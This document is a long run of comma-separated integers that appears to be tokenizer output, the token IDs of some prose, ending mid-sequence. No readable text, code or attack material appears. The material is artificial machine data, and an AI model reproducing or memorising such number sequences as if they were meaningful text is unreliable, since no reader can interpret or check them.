29885, 9796, 304, 1827, 393, 278, 2712, 306, 30010, 345, 10548, 1048, 6142, 393, 2949, 264, 30010, 29873, 1244, 1434, 526, 363, 278, 13638, 29892, 6374, 28473, 29889, 306, 4459, 901, 5994, 4695, 29892, 901, 16500, 29892, 322, 901, 25967, 310, 2305, 925, 408, 896, 526, 29889, 450, 8938, 304, 3907, 1472, 1840, 9850, 7088, 8000, 338, 13587, 373, 304, 1438, 2712, 29889, 2216, 19035, 278, 6374, 9545, 310, 1641, 714, 297, 278, 3186, 297, 8515, 7600, 22047, 491, 8515, 2305, 322, 321, 1218, 8515, 9687, 29892, 541, 304, 953, 13842, 1906, 2712, 491, 27697, 7535, 1735, 373, 278, 2768, 322, 451, 1235, 748, 29889, 13, 13, 6246, 372, 30010, 29879, 1565, 825, 26864, 327, 4083, 29901, 1334, 4091, 451, 2257, 559, 515, 3902, 12418, 29889, 7569, 3250, 508, 367, 697, 310, 3902, 12418, 29892, 310, 24064, 716, 20301, 1907, 29889, 1126, 278, 982, 304, 3013, 2834, 8031, 338, 304, 7952, 12758, 29892, 1584, 1048, 2712, 925, 2820, 278, 11155, 29889, 13, 13, 10401, 306, 750, 278, 8825, 304, 1207, 263, 3023, 7234, 5040, 297, 27903, 9459, 4412, 2012, 310, 22764, 1513, 515, 24132, 1049, 304, 1570, 26884, 29892, 306, 3614, 372, 29889, 13, 13, 4819, 309, 18691, 592, 701, 472, 278, 4799, 637, 322, 591, 26603, 2820, 16611, 593, 776, 29892, 7336, 8491, 278, 1407, 907, 6703, 4257, 19756, 30098, 896, 30010, 276, 599, 1353, 287, 17937, 1218, 515, 263, 2323, 1298, 297, 278, 7256, 310, 278, 4272, 988, 278, 341, 555, 265, 18057, 269, 1169, 29889, 1334, 1716, 302, 1295, 287, 298, 4524, 874, 472, 5241, 30010, 29879, 25448, 2217, 2058, 29892, 4815, 9243, 1725, 313, 6144, 14803, 14366, 322, 769, 3614, 263, 22203, 1549, 7997, 26783, 880, 6115, 315, 1384, 265, 988, 297, 2610, 29892, 591, 750, 263, 25204, 6490, 15007, 2135, 8589, 29889, 306, 4133, 304, 278, 4799, 637, 925, 297, 931, 363, 590, 16286, 304, 367, 29801, 3023, 6199, 29892, 541, 372, 471, 14909, 7088, 372, 29889, 13, 13, 29940, 403, 1754, 263, 2788, 17487, 263, 4723, 2678, 29889, 940, 9698, 701, 5622, 263, 3889, 528, 4774, 280, 3593, 515, 278, 4799, 637, 304, 278, 341, 555, 265, 17567, 988, 263, 2318, 310, 14000, 8310, 22731, 11183, 1075, 763, 10710, 29879, 322, 1346, 29893, 406, 2289, 7575, 29892, 541, 892, 1811, 304, 679, 2768, 592, 3178, 4737, 481, 2015, 1711, 13590, 310, 3236, 29892, 6721, 6433, 763, 1346, 3624, 29876, 30010, 29873, 278, 3186, 5051, 29973, 29489, 30010, 29873, 445, 1316, 263, 9560, 322, 21028, 262, 1218, 3186, 29973, 3872, 30010, 29873, 366, 4997, 988, 372, 2996, 515, 29973, 3834, 697, 750, 304, 1207, 445, 1492, 29973, 2193, 30010, 29879, 4177, 3178, 313, 17491, 8541, 2454, 282, 1485, 267, 472, 674, 1846, 5241, 2996, 304, 670, 26429, 29901, 263, 6017, 7716, 9758, 363, 278, 6575, 842, 29892, 777, 521, 8233, 2125, 714, 29892, 322, 263, 2846, 367, 414, 472, 5241, 30010, 29879, 2058, 29889, 2216, 4319, 363, 385, 10410, 6568, 957, 29889, 13, 13, 4013, 1400, 338, 263, 2217, 1422, 29889, 739, 2113, 30010, 29873, 367, 27849, 297, 263, 2846, 6233, 472, 664, 29889, 1152, 445, 7271, 29892, 366, 1818, 2125, 777, 6483, 16172, 29879, 322, 2821, 596, 3458, 29889, 450, 1855, 7271, 338, 297, 278, 10348, 20102, 472, 278, 1095, 310, 445, 1400, 29889, 13, 13, 4013, 338, 263, 2217, 5807, 666, 277, 310, 263, 4036, 4646, 297, 1570, 26884, 29889, 1670, 30010, 29879, 263, 2217, 1887, 2594, 297, 278, 1085, 22771, 2000, 5493, 29924, 29875, 30010, 29879, 29892, 393, 9358, 277, 290, 7093, 1570, 26884, 29889, 399, 1398, 1623, 29892, 867, 686, 29891, 29892, 2301, 3459, 29892, 541, 2989, 310, 5864, 408, 599, 17042, 2039, 310, 2834, 2041, 4208, 363, 263, 13748, 29889, 306, 750, 263, 2846, 367, 414, 1623, 303, 7121, 1434, 10784, 10549, 278, 380, 7121, 304, 443, 11911, 278, 286, 3096, 839, 10083, 2038, 29889, 306, 1476, 263, 2217, 17052, 4039, 1506, 465, 322, 6031, 21285, 297, 278, 11155, 310, 278, 2217, 1473, 11904, 2594, 5716, 29889, 1670, 892, 2217, 6131, 29574, 2820, 278, 5716, 411, 23794, 793, 25535, 1623, 29892, 322, 260, 16234, 29877, 287, 3581, 2701, 1023, 29899, 10568, 292, 297, 322, 2820, 278, 3719, 29889, 450, 26068, 892, 3964, 29892, 278, 26829, 892, 1880, 29892, 322, 14332, 270, 10003, 322, 19090, 1790, 27822, 4646, 3448, 29889, 13, 13, 29902, 471, 2534, 301, 3322, 9826, 411, 263, 5121, 297, 18737, 13493, 29892, 9432, 292, 373, 278, 1833, 29871, 29929, 7378, 310, 590, 2834, 29889, 5806, 9963, 1048, 278, 3109, 787, 29892, 13133, 29892, 7014, 29892, 322, 4771, 800, 310, 9850, 29892, 306, 1476, 6142, 2289, 1811, 304, 8453, 825, 3732, 372, 599, 7088, 372, 29889, 306, 471, 16246, 4822, 515, 902, 29892, 14455, 29892, 297, 817, 310, 263, 447, 2076, 329, 29892, 411, 694, 4982, 29892, 322, 599, 278, 916, 1855, 1907, 393, 2041, 515, 439, 5367, 322, 19136, 2827, 12459, 29889, 13, 13, 6295, 306, 4689, 304, 8453, 263, 23399, 982, 310, 330, 2987, 292, 445, 7088, 607, 3897, 1346, 8546, 287, 7088, 3178, 13, 13, 1888, 22094, 366, 30010, 276, 16246, 297, 27144, 322, 11584, 29892, 21521, 9800, 29991, 319, 11785, 11013, 29892, 322, 4129, 8796, 15451, 5174, 2305, 29889, 3575, 1591, 29892, 11774, 29892, 22095, 29892, 289, 810, 29892, 322, 1584, 596, 9687, 8796, 15451, 29889, 21223, 2820, 29892, 366, 8369, 393, 297, 2114, 599, 393, 30010, 29879, 2175, 338, 777, 270, 913, 16749, 14603, 29889, 1094, 366, 1106, 472, 278, 916, 2305, 393, 892, 297, 278, 27144, 29892, 366, 30010, 276, 9613, 1363, 1286, 366, 508, 30010, 29873, 316, 455, 8096, 278, 1923, 29892, 5473, 29925, 28865, 29892, 7984, 29892, 470, 27372, 29889, 887, 884, 508, 30010, 29873, 6456, 825, 366, 1258, 363, 263, 8471, 29892, 738, 432, 1191, 265, 29892, 7123, 9012, 29892, 470, 6351, 29889, 2193, 2472, 338, 451, 4100, 1244, 29892, 1363, 6909, 1838, 30010, 29873, 1863, 1244, 29889, 2178, 393, 750, 577, 5948, 3342, 366, 322, 14332, 1683, 338, 1286, 7695, 29892, 322, 372, 30010, 29879, 451, 6421, 1250, 297, 445, 5716, 29889, 13, 13, 26526, 650, 16410, 304, 4337, 2820, 363, 263, 2846, 13689, 1328, 19462, 29892, 322, 14205, 278, 521, 2620, 16410, 29889, 1570, 6166, 310, 2305, 3380, 25391, 322, 521, 23980, 1048, 777, 2289, 8031, 6433, 29889, 1670, 30010, 29879, 694, 22884, 29892, 925, 5193, 29889, 853, 1387, 14983, 3380, 1363, 1286, 14332, 30010, 29879, 7088, 304, 1269, 916, 338, 825, 896, 6232, 29889, 16224, 1907, 29892, 1663, 5861, 29892, 7014, 29892, 322, 7737, 1973, 3380, 4969, 716, 21702, 411, 1438, 4036, 2305, 29892, 1363, 896, 30010, 276, 302, 12535, 310, 4129, 6909, 29892, 4660, 470, 4982, 4475, 322, 3595, 363, 1009, 1346, 8546, 287, 7088, 3178, 13, 13, 29902, 1348, 9850, 292, 338, 263, 2107, 13258, 358, 297, 697, 30010, 29879, 1346, 8546, 287, 7088, 3995, 1363, 29901, 13, 13, 3492, 4953, 263, 10029, 2253, 2022, 304, 505, 373, 8437, 29889, 13, 13, 3492, 788, 263, 2217, 901, 5199, 537, 297, 278, 3186, 29889, 13, 13, 3492, 505, 263, 901, 282, 24701, 29892, 2924, 2264, 29892, 322, 18520, 29889, 13, 13, 3492, 505, 901, 29763, 393, 7985, 322, 429, 2036, 278, 2305, 2820, 366, 29889, 13, 13, 3112, 1838, 30010, 29873, 14240, 304, 1641, 1560, 4254, 29892, 3907, 901, 6909, 29892, 470, 1641, 901, 8031, 29889, 739, 508, 5948, 367, 599, 470, 5642, 310, 1438, 29889, 739, 30010, 29879, 901, 310, 263, 5199, 537, 18187, 2629, 29889, 1105, 1472, 29899, 8489, 9850, 674, 8959, 7910, 596, 1346, 8546, 287, 7088, 3995, 322, 746, 366, 30010, 276, 13407, 302, 12535, 22611, 278, 916, 2305, 29892, 366, 674, 367, 1422, 29889, 13, 13, 5618, 437, 366, 1348, 310, 746, 366, 1348, 310, 9850, 292, 29973, 1222, 29883, 17334, 29973, 6376, 1165, 362, 29973, 422, 3921, 29973, 306, 1304, 304, 29892, 541, 1472, 1840, 9850, 292, 338, 263, 1422, 5828, 29889, 9943, 931, 29889, 317, 5367, 2820, 29889, 22220, 719, 701, 322, 4480, 29889, 1126, 1556, 310, 599, 29892, 8608, 362, 29889, 350, 6394, 29892, 25462, 29892, 22983, 29892, 3814, 267, 29892, 366, 1024, 372, 29889, 13, 13, 29949, 332, 931, 297, 14325, 2715, 701, 304, 29871, 29906, 29906, 29906, 3841, 29892, 470, 29871, 29945, 29892, 29941, 29906, 29947, 6199, 29889, 4587, 445, 29892, 29871, 29953, 29906, 29955, 6199, 892, 10398, 9850, 292, 29889, 2193, 30010, 29879, 1048, 29871, 29906, 29953, 3841, 29892, 322, 29871, 29896, 29906, 29995, 310, 1749, 3001, 9850, 931, 29889, 13, 13, 4806, 1304, 6514, 8608, 362, 471, 3625, 304, 502, 29889, 512, 18444, 591, 1020, 345, 839, 11149, 491, 3593, 813, 297, 2114, 29892, 12463, 591, 1020, 345, 839, 11149, 491, 3593, 29901, 29871, 29906, 29941, 29955, 6199, 3001, 29889, 9287, 26942, 471, 263, 419, 833, 310, 3593, 29892, 13006, 313, 562, 2124, 278, 17812, 280, 317, 481, 29897, 322, 260, 2679, 29899, 29873, 2679, 29889, 8512, 896, 748, 491, 1422, 2983, 813, 260, 2679, 29899, 9161, 2039, 29892, 534, 4245, 7799, 29892, 4469, 364, 860, 845, 10467, 813, 896, 30010, 276, 599, 10992, 29890, 29379, 411, 777, 2656, 310, 4805, 409, 1218, 29892, 763, 263, 7774, 29892, 10959, 304, 278, 1250, 470, 278, 2625, 29889, 512, 997, 359, 29892, 498, 26517, 322, 26417, 423, 29892, 491, 3593, 29889, 26260, 491, 3593, 322, 534, 4245, 2841, 29889, 13, 13, 2855, 310, 3236, 29892, 591, 10398, 263, 3287, 310, 931, 373, 1422, 17690, 310, 25462, 813, 1716, 11359, 5089, 3262, 322, 1933, 292, 29889, 450, 25462, 364, 4618, 515, 6210, 833, 1446, 304, 289, 314, 833, 29877, 9124, 294, 29892, 2919, 27278, 10013, 432, 2960, 25462, 304, 3005, 14643, 13968, 1304, 408, 6013, 2722, 29889, 13, 13, 5323, 955, 491, 1559, 471, 2846, 322, 2215, 1546, 29889, 1987, 727, 526, 3814, 267, 29889, 1724, 3508, 30010, 29873, 9875, 1244, 338, 278, 5253, 310, 931, 5714, 8454, 297, 472, 385, 4799, 637, 29892, 2675, 1549, 6993, 29892, 16246, 2820, 10534, 363, 7613, 292, 29889, 383, 5890, 471, 3117, 590, 3203, 25448, 982, 304, 9850, 29889, 13, 13, 2059, 769, 1095, 310, 278, 17487, 29892, 263, 29871, 29896, 29953, 29899, 18721, 3593, 22203, 694, 5520, 6140, 1146, 348, 1259, 29892, 22764, 4359, 6140, 763, 923, 1218, 29892, 322, 591, 694, 5520, 4312, 9418, 29899, 29885, 8194, 29899, 29879, 860, 2264, 282, 6090, 373, 25462, 29889, 3201, 955, 292, 411, 2999, 12368, 322, 12092, 12049, 528, 279, 2238, 287, 1749, 4771, 267, 322, 11664, 1749, 11509, 304, 1044, 9098, 322, 14111, 1749, 8388, 618, 886, 16467, 29889, 317, 5367, 363, 6199, 373, 3593, 267, 4846, 502, 931, 304, 9432, 373, 278, 4940, 322, 304, 1348, 1048, 278, 5434, 29889, 739, 30010, 29879, 445, 1623, 931, 29892, 278, 931, 10398, 25970, 322, 5073, 653, 393, 306, 7091, 306, 2355, 304, 1073, 6142, 297, 263, 716, 982, 29892, 1728, 278, 1320, 336, 1953, 310, 1432, 3250, 2834, 29889, 739, 30010, 29879, 746, 306, 750, 278, 8825, 304, 2244, 6142, 2898, 5155, 322, 505, 931, 304, 2740, 363, 278, 6089, 2768, 29889, 13, 13, 8809, 488, 278, 6136, 29892, 5566, 11407, 19462, 310, 263, 1472, 17487, 1122, 883, 596, 2821, 342, 2626, 3842, 29892, 372, 30010, 29879, 278, 11813, 19462, 310, 17842, 393, 2289, 8267, 278, 716, 2022, 366, 1122, 4459, 763, 746, 366, 18331, 3271, 29889, 13, 13, 8439, 338, 694, 7404, 1048, 372, 29901, 24132, 1049, 338, 29663, 29889, 306, 30010, 345, 6091, 2305, 1246, 372, 278, 18737, 13493, 310, 278, 6211, 18320, 313, 4716, 306, 22941, 929, 411, 14364, 1363, 278, 12245, 17726, 2734, 472, 7145, 11147, 322, 263, 8818, 29875, 21544, 982, 901, 1135, 263, 27723, 29093, 23586, 785, 29958, 18737, 13493, 22203, 467, 25678, 29892, 372, 30010, 29879, 925, 975, 278, 12945, 515, 28768, 29889, 739, 756, 2107, 12374, 1934, 29892, 4646, 19264, 29892, 322, 967, 1407, 1914, 9560, 19437, 813, 2107, 363, 263, 29871, 29941, 29889, 29945, 29899, 26763, 16812, 470, 385, 17724, 11942, 7823, 29889, 1126, 1550, 591, 892, 727, 29892, 591, 750, 278, 14828, 479, 310, 1098, 2548, 278, 24132, 1049, 3012, 7487, 29885, 332, 29889, 13, 13, 7058, 28728, 4646, 591, 281, 3825, 287, 1549, 278, 19756, 310, 16611, 593, 776, 24132, 1049, 591, 5555, 4249, 21464, 23080, 4123, 322, 2030, 29892, 313, 276, 635, 274, 1082, 29897, 413, 4841, 29892, 322, 777, 7970, 6588, 3063, 2305, 29889, 512, 590, 9426, 29892, 263, 2107, 6837, 29889, 2178, 23551, 310, 2473, 29899, 29893, 354, 29872, 839, 8608, 362, 29349, 839, 1549, 278, 11660, 6289, 813, 306, 30010, 29885, 9963, 1048, 2289, 4802, 4768, 446, 1134, 2712, 411, 29871, 29946, 30139, 21266, 1379, 393, 12949, 701, 304, 3023, 2305, 29889, 450, 22314, 12271, 310, 5807, 737, 29899, 845, 10501, 13977, 6761, 683, 23610, 413, 4841, 304, 8171, 297, 322, 8206, 263, 1346, 276, 647, 30024, 393, 10767, 29893, 3974, 515, 278, 5807, 737, 30010, 29879, 25504, 1056, 29872, 29889, 7849, 310, 278, 1616, 471, 599, 1492, 29892, 541, 727, 892, 777, 12528, 25554, 29879, 29892, 763, 20629, 1535, 1677, 4479, 2326, 29878, 886, 322, 263, 1410, 29891, 411, 263, 29871, 29896, 29929, 29906, 29900, 29879, 7522, 19623, 409, 16958, 4933, 393, 723, 2888, 380, 2335, 2983, 322, 25834, 11480, 2381, 905, 267, 310, 10508, 363, 263, 11232, 279, 29889, 13, 13, 13555, 263, 7303, 6199, 527, 18508, 292, 373, 263, 1887, 23363, 29914, 1646, 2373, 601, 29892, 591, 2343, 287, 263, 2846, 10930, 3448, 515, 278, 11660, 6289, 304, 26635, 402, 798, 386, 29889, 26635, 402, 798, 386, 3012, 7817, 19700, 16157, 17906, 411, 5849, 284, 29892, 19119, 322, 9128, 766, 11614, 29892, 13138, 263, 20436, 18099, 5177, 363, 1616, 4695, 15278, 29892, 23363, 22360, 322, 7333, 4603, 29889, 3012, 1287, 9926, 14561, 297, 445, 5412, 5177, 338, 5134, 297, 19555, 16250, 322, 19133, 29879, 3186, 8157, 29889, 1126, 1550, 306, 16289, 306, 30010, 345, 1063, 714, 310, 278, 4234, 29892, 451, 297, 278, 9358, 293, 5893, 310, 1616, 9257, 763, 306, 471, 297, 23526, 29892, 306, 1603, 1348, 393, 278, 1616, 373, 2479, 471, 278, 1900, 306, 30010, 345, 3595, 297, 7786, 3370, 29889, 450, 14603, 526, 10664, 297, 1616, 813, 599, 363, 14686, 29892, 541, 1568, 310, 372, 2307, 5239, 29889, 306, 18012, 278, 10675, 886, 310, 12736, 368, 15161, 322, 17952, 29892, 8152, 3137, 322, 274, 1446, 29889, 1670, 892, 8939, 342, 1338, 594, 1398, 287, 411, 5650, 29899, 29885, 1829, 11105, 29879, 322, 385, 4152, 281, 598, 8697, 2989, 310, 5147, 314, 1199, 29889, 450, 2058, 471, 8681, 8491, 322, 306, 30010, 29885, 1854, 278, 20612, 1016, 30010, 29873, 437, 372, 15426, 29889, 13, 13, 9190, 5040, 471, 263, 2058, 2000, 278, 7236, 15230, 29889, 450, 18403, 471, 263, 2217, 1139, 519, 29892, 322, 13977, 1711, 306, 1348, 372, 30010, 29879, 2289, 3802, 304, 1749, 716, 2058, 29889, 1670, 471, 263, 2656, 310, 1207, 9500, 2594, 297, 278, 2058, 269, 7807, 1023, 2712, 29901, 1346, 3868, 4298, 3623, 625, 30024, 322, 6425, 524, 354, 29889, 7298, 1693, 635, 1346, 354, 4298, 3623, 625, 30024, 471, 263, 378, 1111, 428, 13235, 297, 1407, 2319, 26855, 313, 2222, 1135, 4203, 263, 6651, 18002, 511, 1754, 310, 330, 5621, 11417, 29892, 6425, 524, 354, 313, 12254, 278, 281, 555, 6115, 29897, 322, 330, 5621, 8080, 29889, 1334, 750, 263, 2107, 931, 21217, 4696, 297, 445, 5412, 2913, 29892, 541, 278, 2446, 2462, 29892, 1156, 6732, 29923, 310, 1438, 6425, 18245, 368, 4257, 13748, 29879, 29892, 306, 7091, 763, 306, 2355, 7124, 491, 263, 3593, 322, 10205, 839, 304, 7344, 3209, 950, 14983, 29889, 13, 13, 3596, 297, 599, 29892, 13568, 6288, 4646, 297, 24132, 1049, 29889, 306, 1348, 445, 7271, 5239, 592, 373, 24817, 292, 1283, 1749, 6211, 18320, 620, 3615, 1270, 297, 445, 14225, 2217, 4272, 29889, 13, 13, 10401, 8401, 304, 263, 716, 4272, 29892, 306, 1348, 372, 30010, 29879, 4100, 304, 437, 263, 4513, 310, 6282, 391, 29891, 6433, 304, 679, 304, 1073, 278, 4272, 515, 393, 1298, 310, 1776, 393, 366, 1122, 2360, 505, 1449, 29889, 5806, 591, 27661, 411, 951, 801, 297, 3786, 322, 2610, 29892, 591, 1754, 1854, 304, 437, 925, 393, 29889, 13, 13, 29994, 2233, 314, 521, 340, 672, 472, 12030, 3504, 30010, 29879, 806, 29293, 29892, 1423, 29889, 13, 29994, 12939, 29871, 29941, 29929, 304, 1074, 278, 7205, 301, 1080, 29892, 1423, 29889, 13, 29994, 11554, 6282, 304, 838, 4117, 9504, 29892, 451, 7120, 1283, 925, 3447, 29889, 1334, 24867, 1048, 372, 263, 3287, 322, 591, 3290, 373, 278, 23041, 322, 5148, 472, 278, 2217, 11359, 29889, 11644, 3926, 5304, 304, 6493, 502, 937, 29892, 366, 30010, 276, 297, 363, 263, 7539, 13, 29994, 13301, 29872, 27439, 1387, 29892, 1423, 29889, 910, 2058, 338, 29663, 29889, 3387, 263, 281, 598, 8697, 2989, 310, 325, 524, 482, 19480, 21497, 8090, 29889, 13, 29994, 7103, 1559, 8177, 262, 30010, 29892, 1423, 29889, 13, 13, 29902, 505, 263, 11223, 306, 30010, 645, 437, 1438, 2712, 1784, 3064, 1434, 372, 30010, 29879, 599, 975, 813, 322, 727, 892, 263, 2846, 916, 2217, 714, 886, 2253, 6216, 363, 24060, 29889, 8502, 11418, 5414, 24211, 17724, 297, 5556, 2361, 4815, 470, 263, 2462, 17487, 714, 304, 1085, 262, 5127, 363, 263, 7251, 446, 29889, 8502, 11423, 635, 380, 22155, 1549, 278, 323, 1581, 417, 262, 470, 8454, 714, 263, 716, 4768, 446, 18296, 322, 5622, 263, 22267, 363, 263, 10917, 373, 278, 2812, 1646, 29883, 328, 8854, 322, 2820, 278, 4406, 1934, 30010, 10728, 1974, 29889, 13, 13, 14959, 292, 1250, 472, 1438, 20612, 3732, 592, 2289, 24173, 1048, 1749, 4802, 4337, 304, 3087, 8970, 297, 925, 1090, 1023, 11405, 813, 577, 7875, 322, 5216, 1369, 18987, 596, 1998, 1169, 29991, 13, 13, 29950, 459, 297, 278, 1559, 411, 777, 310, 596, 25448, 2305, 29889, 21809, 278, 5417, 1623, 29889, 9603, 701, 278, 4696, 29889, 22303, 746, 366, 505, 304, 1236, 29872, 29889, 22303, 746, 366, 30010, 276, 9074, 14793, 29889, 22303, 746, 366, 1074, 2305, 413, 568, 1190, 29888, 292, 322, 366, 864, 304, 505, 263, 17649, 1106, 29889, 739, 30010, 29879, 263, 1855, 6520, 17487, 813, 1554, 6446, 1422, 515, 825, 591, 29892, 408, 1250, 4058, 414, 297, 317, 449, 15879, 14325, 29892, 750, 1063, 10623, 3277, 28177, 29889, 13, 13, 10454, 29892, 306, 30010, 29885, 263, 4802, 13524, 310, 970, 8608, 362, 29889, 306, 5360, 22983, 29889, 306, 30010, 345, 21633, 304, 11188, 3593, 267, 29889, 3323, 1994, 29892, 534, 2232, 29892, 260, 28872, 952, 29892, 1804, 592, 701, 29889, 1205, 1156, 975, 9881, 7378, 310, 8679, 373, 3593, 14582, 304, 679, 592, 515, 1298, 319, 304, 1298, 350, 29892, 372, 30010, 29879, 263, 18892, 304, 748, 373, 263, 1571, 6520, 17487, 29889, 1126, 1833, 4723, 746, 591, 26603, 1623, 304, 7510, 17960, 29892, 263, 3593, 925, 723, 451, 505, 5700, 372, 29889, 13, 13, 26526, 2507, 1623, 29469, 29871, 29896, 443, 345, 2719, 1790, 16172, 29899, 29873, 5086, 1776, 322, 278, 2761, 310, 1641, 297, 278, 7156, 30010, 29879, 12949, 6511, 366, 304, 5040, 322, 11188, 1438, 8386, 2012, 310, 4207, 292, 596, 7899, 29899, 1609, 6731, 5275, 25078, 29889, 1094, 591, 1020, 345, 839, 701, 322, 1623, 278, 12180, 29892, 591, 2355, 701, 3802, 322, 7333, 411, 263, 25695, 2989, 310, 413, 568, 1190, 25534, 322, 263, 301, 650, 6575, 1076, 7205, 301, 291, 29936, 3512, 1468, 2027, 3787, 17394, 3262, 29892, 607, 3275, 304, 951, 801, 10596, 5832, 263, 5101, 310, 9679, 261, 2204, 3076, 363, 395, 29896, 29889, 29941, 29900, 322, 8469, 292, 304, 7618, 895, 2820, 363, 263, 2846, 6233, 1434, 28435, 304, 278, 25695, 29936, 322, 11084, 472, 263, 6520, 2975, 4538, 261, 363, 7375, 521, 542, 23167, 304, 269, 666, 408, 591, 20654, 278, 6575, 842, 975, 278, 23474, 29889, 13, 13, 2887, 306, 5456, 445, 1400, 29892, 306, 1898, 304, 22134, 445, 17487, 304, 920, 7112, 2556, 278, 4464, 310, 8608, 362, 338, 373, 7333, 7271, 1550, 9850, 292, 313, 4716, 338, 372, 467, 1205, 297, 278, 1095, 29892, 445, 1400, 338, 925, 297, 3632, 482, 310, 278, 6520, 17487, 785, 278, 439, 524, 404, 2556, 3082, 9850, 7271, 813, 322, 278, 26959, 519, 2462, 411, 7875, 393, 951, 801, 30010, 29879, 2217, 360, 17979, 2448, 265, 9213, 8267, 408, 591, 7618, 3368, 1623, 278, 12180, 310, 14299, 8046, 29889, 13, 13, 6185, 296, 19006, 322, 1855, 923, 968, 526, 2898, 304, 1284, 297, 317, 449, 15879, 14325, 29889, 1126, 1550, 591, 7656, 30010, 29873, 1246, 20278, 378, 1217, 5582, 1295, 29892, 591, 13726, 1716, 9425, 368, 1550, 28177, 322, 2714, 372, 5181, 304, 18864, 263, 2846, 3841, 4380, 292, 701, 411, 1749, 2030, 7875, 29889, 1724, 2253, 982, 304, 337, 562, 339, 2365, 20278, 1135, 263, 2462, 17487, 515, 3087, 8970, 701, 304, 5791, 4125, 5127, 29973, 13, 13, 29909, 7899, 1549, 360, 719, 15594, 13939, 29892, 6641, 310, 5791, 4125, 29892, 2355, 502, 1283, 278, 367, 2579, 19006, 29899, 29873, 579, 292, 2224, 322, 964, 777, 2319, 29892, 3942, 1065, 325, 457, 29891, 3163, 411, 395, 29945, 260, 579, 292, 1238, 267, 29889, 365, 1878, 4235, 270, 15048, 411, 2646, 19583, 274, 1242, 29892, 263, 14378, 681, 14744, 1220, 29892, 27777, 22696, 10664, 297, 4206, 310, 330, 2390, 267, 29892, 322, 278, 14744, 813, 24099, 1546, 9570, 29891, 411, 3578, 1510, 414, 29892, 304, 27592, 6575, 367, 2232, 11293, 292, 1549, 20118, 880, 26563, 813, 6766, 701, 263, 1238, 579, 363, 278, 5076, 29889, 1670, 526, 975, 263, 24231, 325, 457, 29891, 3163, 297, 278, 4038, 29936, 591, 16669, 5320, 29892, 322, 1749, 10608, 3907, 1889, 471, 5051, 4036, 29892, 12547, 372, 697, 2507, 3448, 29973, 7440, 591, 763, 278, 1024, 29973, 12547, 372, 1722, 29973, 450, 871, 1855, 11809, 471, 694, 260, 579, 292, 27684, 975, 395, 29945, 29889, 13, 13, 1576, 4038, 4266, 7093, 297, 796, 7192, 392, 1379, 813, 591, 260, 28470, 263, 3287, 310, 805, 4245, 281, 1475, 29889, 4587, 278, 325, 457, 29891, 3163, 29892, 590, 7333, 25448, 471, 350, 3547, 29892, 988, 278, 260, 579, 292, 471, 2768, 263, 24230, 29892, 278, 14603, 301, 1312, 411, 24952, 2594, 2674, 29879, 29889, 450, 871, 18046, 280, 591, 20848, 471, 263, 317, 5555, 5464, 3164, 4564, 515, 751, 440, 3055, 29892, 988, 1749, 3495, 5439, 260, 579, 267, 297, 4958, 310, 278, 14413, 9687, 5101, 886, 29889, 450, 25453, 669, 399, 457, 4004, 310, 1009, 3268, 947, 1554, 2788, 29892, 1361, 29891, 363, 1906, 310, 502, 1058, 526, 3063, 304, 10985, 1749, 19006, 7134, 29889, 1334, 7120, 714, 278, 19780, 17888, 25005, 472, 1588, 21496, 399, 1475, 29892, 988, 951, 801, 30010, 29879, 696, 3011, 403, 7829, 591, 505, 301, 3322, 297, 1009, 714, 17433, 4038, 29892, 4866, 411, 29735, 322, 11942, 7823, 6131, 813, 541, 278, 260, 579, 292, 471, 395, 29896, 29900, 322, 278, 14826, 3109, 1135, 14413, 363, 2599, 3099, 5377, 29889, 8680, 2186, 5040, 471, 796, 436, 18544, 14662, 478, 457, 19852, 988, 278, 19006, 9262, 471, 9078, 29892, 541, 591, 1258, 263, 2594, 2674, 260, 579, 292, 29889, 402, 13536, 5360, 278, 19006, 266, 2575, 29889, 2180, 1749, 1407, 937, 5040, 310, 278, 2462, 29892, 13015, 8892, 708, 29892, 1749, 3495, 404, 5429, 502, 1048, 263, 1106, 449, 1298, 29892, 988, 1156, 263, 1472, 2462, 310, 260, 579, 292, 591, 3512, 363, 263, 11199, 30010, 29879, 10977, 1776, 310, 278, 19599, 29889, 13, 13, 2951, 1749, 982, 1250, 304, 3087, 8970, 29892, 591, 281, 618, 1749, 982, 701, 322, 975, 363, 2868, 22696, 322, 1549, 2319, 29892, 1373, 4056, 8046, 20248, 29892, 304, 679, 304, 22080, 29871, 29896, 29889, 1334, 11630, 3614, 278, 1472, 982, 2820, 3969, 304, 278, 11379, 297, 278, 402, 7024, 29892, 322, 1749, 5121, 5241, 5456, 385, 8031, 1400, 20603, 491, 445, 7271, 313, 3018, 955, 411, 23797, 1728, 13436, 11322, 467, 20370, 982, 2466, 29892, 591, 7450, 278, 380, 27389, 379, 12822, 29871, 29896, 322, 11084, 304, 7251, 446, 1623, 304, 278, 25695, 322, 6505, 278, 9324, 310, 278, 14328, 282, 618, 278, 6501, 11982, 29889, 450, 1791, 310, 278, 7899, 1925, 777, 310, 278, 1556, 9560, 8386, 297, 6813, 373, 2479, 408, 591, 298, 688, 3192, 278, 12180, 1250, 1623, 304, 3087, 1352, 29892, 10201, 18055, 278, 4272, 3025, 278, 16108, 22510, 16230, 29889, 13, 13, 4806, 30010, 276, 1250, 297, 278, 5922, 322, 10623, 3277, 3109, 9257, 19253, 1135, 23483, 630, 29889, 1334, 11977, 297, 3087, 8970, 988, 591, 30010, 645, 18864, 263, 2846, 11405, 411, 278, 12355, 873, 951, 801, 11902, 1725, 313, 29940, 403, 30010, 29879, 9883, 29892, 590, 1781, 5121, 29892, 322, 1749, 1993, 2136, 261, 29897, 1058, 30010, 29879, 4802, 17819, 322, 5112, 29886, 519, 5864, 1395, 300, 287, 502, 472, 278, 4799, 637, 29889, 1763, 1749, 16671, 29892, 408, 591, 429, 1573, 278, 8638, 29892, 263, 298, 2497, 29899, 1251, 459, 292, 25063, 15933, 4847, 29892, 263, 6025, 2265, 411, 263, 25341, 322, 263, 21282, 29887, 5168, 281, 5555, 263, 2910, 310, 278, 3186, 408, 263, 7353, 29892, 4689, 6025, 3277, 322, 8743, 29892, 306, 1016, 30010, 29873, 1584, 1073, 825, 29892, 1554, 3082, 29889, 1334, 8389, 297, 21863, 882, 408, 896, 7743, 1009, 4180, 29892, 343, 14356, 1346, 28862, 2763, 304, 6813, 6824, 30024, 322, 17096, 3448, 29889, 13, 13, 29956, 340, 29889, 13, 13, 30015, 3492, 30010, 345, 2360, 3595, 4129, 3995, 11682, 278, 6993, 8372, 408, 591, 1539, 278, 2654, 29899, 10921, 29899, 392, 29899, 9539, 29899, 695, 328, 17616, 322, 6452, 287, 963, 363, 1009, 8548, 29889, 319, 4802, 3969, 304, 951, 801, 29892, 1058, 30010, 29879, 13426, 18272, 